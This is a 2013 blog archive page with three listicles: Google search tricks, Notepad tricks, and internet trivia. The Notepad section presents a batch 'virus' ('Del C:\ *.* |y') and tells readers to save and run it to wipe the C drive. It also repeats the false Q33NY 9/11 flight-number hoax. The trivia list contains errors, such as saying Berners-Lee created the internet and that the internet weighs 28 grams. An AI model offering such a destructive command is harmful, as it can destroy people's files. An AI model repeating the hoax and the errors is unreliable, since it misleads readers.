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Showing posts with label Top Facts. Show all posts

25 May 2013

Top 10 unknown Google tricks

Below is a list of our top ten Google tricks many people who use Google don't know about.



Definitions

Pull up the definition of the word by typing define followed by the word you want the definition for. For example, typing: define bravura would display the definition of that word.


Local search

Visit Google Local enter the area you want to search and the keyword of the place you want to find. For example, typing: restaurant at the above link would display local restaurants.


Phone number look up

Enter a full phone number with area code to display the name and address associated with that phone number.


Find weather and movies

Type "weather" or "movies" followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for show times for movies in that area.


Track airline flight and packages

Enter the airline and flight number to display the status of an airline flight and it's arrival time. For example, type: delta 123 to display this flight information if available.

Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.


Translate

Translate text, a full web page, or search by using the Google Language Tools.


Pages linked to you

See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typing link:http://www.facebook.com displays all pages linking to Facebook.


Find PDF results only

Add fileType: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: "dell xps" fileType:pdf -- this is a great way to find online manuals.


Calculator

Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing: 100 + 200 would display results as 300.


Stocks

Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.

23 May 2013

Top 5 Notepad Trick :

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.



2. Matrix Effect Trick 

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Notepad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.



3. Creating Virus That Format C Drive
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.



4. Making Personal Diary Using Notepad 
notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad


5. Dancing Keyboard Led

keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

9 May 2013

Ten Facts About Internet and WWW....

           The history of technologies that caused the internet to be created dates back to the 50′s, but only in 1982 the modern internet was built based on the TCP/IP protocol.

In this article we’re going to share some interesting facts about the Internet, facts that every Internet user should know.

Fact 1: The WWW was created by one man:
While the internet is the result of an effort made by many scientists and programmers, the WWW was created by one man and later it was implemented on the Internet. That man is Tim Berners-Lee.

Fact 2: The weight of the Internet:
The most popular myths about the weight of the internet is rather a salt particle, a strawberry, however, information doesn’t have weight.Measuring the electrons that store 5 million terabytes, the answer is this: the internet weights around 28 grams.

Fact 3: Number of people connected to the Internet:

In December of 2011, 2.267.233.762 people were connected to the Internet. In 2012 the number gets close to 2,5 billion and Asia is still the continent with the most people connected to the Internet, twice as many as Europe and four times more than the United States Internet users.

Fact 4: Mosaic was not the first internet web browser:


The browser helped expand the world wide web, Mosaic, was not the first web browser in creation. Mosaic was just the first browser capable of displaying images. The first web browser was created by Tim Berners-Lee, the man who created the internet. At first it was named WWW but later the name was changed to Nexus. 

Fact 5: The first webcam streaming:

The first webcam, invented by the Cambridge university, sent a very important piece of information on the Internet: images of a coffee machine and this happened in 1991. The webcam was invented so that Cambridge researchers can see what the coffee is ready.

Fact 6: First video uploaded on YouTube:

“Me at the Zoo” was the first video to be uploaded on YouTube and it is still available today on youtube.com. The video was created by one of the three YouTube founders, Jawed Karim, in 2005.

Fact 7: The internet destroyed the autograph:

There are still people who collect autographs but celebrities are more open now than they were 10 years ago. Personal websites and social networking allows anyone to post a message for a celebrity to see. Celebrities often also reply to messages from users.

Fact 8: The Internet Users:

About 1/6 of Earth’s total population enjoys surfing the internet at least once per month. Many of the people who do not surf the internet, however, have noted that they would like to enjoy internet pictures and videos if they had the opportunity.

Fact 9: The internet Usage:

Over half of all the downloading and uploading online is file sharing that is often considered illegal. Another rising portion of the overall bandwidth that will likely get bigger and bigger is from streaming video services such as Netflix.

Fact 10:Security and Privacy Policy:

Security and privacy concerns have always been a problem on the Internet with many people often unaware of the potential risks they take when inputting confidential data, passwords and personal information into various websites. Viruses and spam emails are other sources over security concerns which frequently cause disruptions and headaches for users of the web.

From the Links:-
www.netquake.com
www.sciencekids.co.nz
www.hahanice.com

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